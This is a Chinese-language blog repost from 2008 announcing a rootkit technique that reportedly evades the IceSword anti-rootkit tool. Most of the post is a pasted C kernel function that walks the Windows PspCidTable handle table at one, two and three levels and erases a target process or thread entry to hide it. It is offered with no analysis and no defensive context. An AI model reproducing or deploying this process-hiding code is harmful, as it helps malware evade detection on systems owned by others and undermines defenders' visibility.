Chinaunix首页 | 论坛 | 博客

程序员学习

首页 |  博文目录 |  关于我

UGxxoVr

  • 博客访问: 848067
  • 博文数量: 756
  • 博客积分: 40000
  • 博客等级: 大将
  • 技术积分: 4980
  • 用 户 组: 普通用户
  • 注册时间: 2008-10-13 14:40
文章分类

全部博文(756)

文章存档

2011年(1)

2008年(755)

我的朋友
最近访客
推荐博文
有新的ROOTKIT技术似乎能逃过icesword

分类:

2008-10-13 16:10:57

详见fo,foto

贴一下其中的一段代码:

////////////////////////////////////////////////////////////////////
// void EraseObjectFromTable
//
//      IN PEPROCESS         address of the handle table that will
//                           be parsed and altered.
//
//  PVOID     address of the object to hide.
//
//      OUT
//
//  Description:         Erases the target object from the handle
//                           table if it is found.
//
//      Note:     We do not first lock the handle table so
//                           things could get dicey
void EraseObjectFromPspCidTable(DWORD handle_table, PVOID tarHandle, enum ObjectType obj_type, DWORD pid, DWORD tid)
{
 PTABLE_ENTRY   orig_tableEntry, p_tableEntry, *pp_tableEntry, **ppp_tableEntry;
 int a, b, c;
 int i_numHandles, i_hperPage, i_numTables;
 int i_handle;

 i_numHandles = *(int*)(handle_table + HANDLECOUNTOFFSET);
 orig_tableEntry = (PTABLE_ENTRY)*(PDWORD)(handle_table + TABLEOFFSET);
 i_numTables = ((DWORD)orig_tableEntry & 3);
 
 
 if (b_isXP2K3 == TRUE)
 {
  i_hperPage = PAGE_SIZE/sizeof(TABLE_ENTRY); 
  
  if (i_numTables == 0)
  {
   
//   DbgPrint("Found a single level handle table.\n");
   p_tableEntry = (PTABLE_ENTRY)((DWORD)orig_tableEntry & 0xfffffff8);
   for (a = 0; a < i_hperPage; a++)
   {
    if (((p_tableEntry[a].object | 0x80000000) & 0xfffffff8) == ((DWORD)tarHandle))
    {
//     DbgPrint("[%d]\n",a);
//     DbgPrint("Handle = %x Object %x Security %x\n", a*4, ((p_tableEntry[a].object | 0x80000000) & 0xfffffff8), p_tableEntry[a].security);
     
//     add_index(&g_PspCidTableList, SINGLE_LEVEL,obj_type,(DWORD)tarHandle,pid,tid, a,0, 0, p_tableEntry[a].object, p_tableEntry[a].security);
    
     p_tableEntry[a].object = 0;
     p_tableEntry[a].security = ((PHANDLE_TABLE)handle_table)->FirstFree;
     ((PHANDLE_TABLE)handle_table)->FirstFree = (ULONG)( (tid!=0) ? tid : pid );
    }
   }
  }
  else if (i_numTables == 1)
  {
//   DbgPrint("Found a two level handle table.\n");
   pp_tableEntry = (PPTABLE_ENTRY)((DWORD)orig_tableEntry & 0xfffffff8);
   
   for (a = 0; a < i_hperPage; a++)
   {
    if (pp_tableEntry[a] == NULL)
     break;

    for (b = 0; b < i_hperPage; b++)
    {
     //DbgPrint("Comparing %x to %x\n", ((pp_tableEntry[a][b].object | 0x80000000) & 0xfffffff8), tarHandle);
     if (((pp_tableEntry[a][b].object | 0x80000000) & 0xfffffff8) == ((DWORD)tarHandle))
     {
//      DbgPrint("[%d][%d]\n",a,b);
//      DbgPrint("Handle = %x Object %x Security %x\n", ((a*512)+b)*4, ((pp_tableEntry[a][b].object | 0x80000000) & 0xfffffff8), pp_tableEntry[a][b].security);
//      add_index(&g_PspCidTableList, DOUBLE_LEVEL,obj_type,(DWORD)tarHandle, pid,tid,  a,b, 0, pp_tableEntry[a][b].object, pp_tableEntry[a][b].security);

      pp_tableEntry[a][b].object = 0;
      pp_tableEntry[a][b].security = ((PHANDLE_TABLE)handle_table)->FirstFree;
         ((PHANDLE_TABLE)handle_table)->FirstFree = (ULONG)( (tid!=0) ? tid : pid );
     }
    }
    
   }
  }
  else if (i_numTables == 2)
  {
//   DbgPrint("Found a three level handle table.\n");
   ppp_tableEntry = (PPPTABLE_ENTRY)((DWORD)orig_tableEntry & 0xfffffff8);
   for (a = 0; a < i_hperPage; a++)
   {
    if (ppp_tableEntry[a] == NULL)
     break;

    for (b = 0; b < i_hperPage; b++)
    {
     if (ppp_tableEntry[a][b] == NULL)
      break;

     for (c = 0; c < i_hperPage; c++)
     {
      if (((ppp_tableEntry[a][b][c].object | 0x80000000) & 0xfffffff8) == ((DWORD)tarHandle))
      {
//       DbgPrint("Handle = %x Object %x Security %x\n", ((a*512)+(b*256)+c)*4, ((ppp_tableEntry[a][b][c].object | 0x80000000) & 0xfffffff8), ppp_tableEntry[a][b][c].security);
//       add_index(&g_PspCidTableList, TRIPLE_LEVEL,obj_type, (DWORD)tarHandle, pid,tid,  a,b, c, ppp_tableEntry[a][b][c].object, ppp_tableEntry[a][b][c].security);

       ppp_tableEntry[a][b][c].object = 0;
       ppp_tableEntry[a][b][c].security = ((PHANDLE_TABLE)handle_table)->FirstFree;
             ((PHANDLE_TABLE)handle_table)->FirstFree = (ULONG)( (tid!=0) ? tid : pid );
      }
     }
     
    }
   }
  }
 }
 else if (b_isXP2K3 == FALSE)
 {
  i_hperPage = 256;

//  DbgPrint("Found a three level handle table.\n");
  ppp_tableEntry = (PPPTABLE_ENTRY)((DWORD)orig_tableEntry & 0xfffffff8);
  for (a = 0; a < i_hperPage; a++)
  {
   if (ppp_tableEntry[a] == NULL)
    break;

   for (b = 0; b < i_hperPage; b++)
   {
    if (ppp_tableEntry[a][b] == NULL)
     break;

    for (c = 0; c < i_hperPage; c++)
    {

     if (((ppp_tableEntry[a][b][c].object | 0x80000000) & 0xfffffff8) == ((DWORD)tarHandle))
     {
//      add_index(&g_PspCidTableList, TRIPLE_LEVEL,obj_type, (DWORD)tarHandle, pid,tid,  a,b, c, ppp_tableEntry[a][b][c].object, ppp_tableEntry[a][b][c].security);
//      DbgPrint("Handle = %x Object %x Security %x\n", ((a*512)+(b*256)+c)*4, ((ppp_tableEntry[a][b][c].object | 0x80000000) & 0xfffffff8), ppp_tableEntry[a][b][c].security);
      ppp_tableEntry[a][b][c].object = 0;
      ppp_tableEntry[a][b][c].security = 0;
     }
    }
    
   }
  }
 }
}


--------------------next---------------------

阅读(501) | 评论(0) | 转发(0) |
0

上一篇:Why smart people defend bad ideas

下一篇:CP上转的一个函数对象的好例子

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6